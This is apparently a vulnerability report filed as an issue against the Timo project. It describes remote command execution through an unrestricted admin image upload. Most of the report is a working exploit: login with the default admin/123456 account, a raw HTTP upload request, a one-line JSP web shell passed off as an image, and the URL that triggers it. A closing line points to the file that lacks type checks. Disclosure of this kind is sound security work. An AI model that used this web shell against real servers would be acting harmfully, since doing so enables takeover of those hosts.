There is a remote command execution vulnerability in Timo. #6
Description
[Vulnerability type]
remote command execution
[Exploit]
start project with Tomcat:
log in as admin use default account admin/123456
send http package:
POST /upload/image HTTP/1.1
Host: localhost:8080
Content-Length: 279
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycmnNKqG4xKTyH1xG
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/dev/build
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1701849099,1701995116; JSESSIONID=bd38c610-5e87-4046-9a18-4489536b2379
Connection: close
------WebKitFormBoundarycmnNKqG4xKTyH1xG
Content-Disposition: form-data; name="image"; filename="JustAPic.jsp"
Content-Type: image/jpeg
<%
Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
%>
------WebKitFormBoundarycmnNKqG4xKTyH1xG--
Then we get response:
Then we can execute arbitrary cmd in jsp trojan.
http://localhost:8080/upload/images/20240103/16b524e10f8b4dc0aaf0acb139effc8d.jsp?cmd=calc
There is no filetype restriction in admin/src/main/java/com/linln/admin/system/controller/UploadController.java. Just add some filters to fix this problem.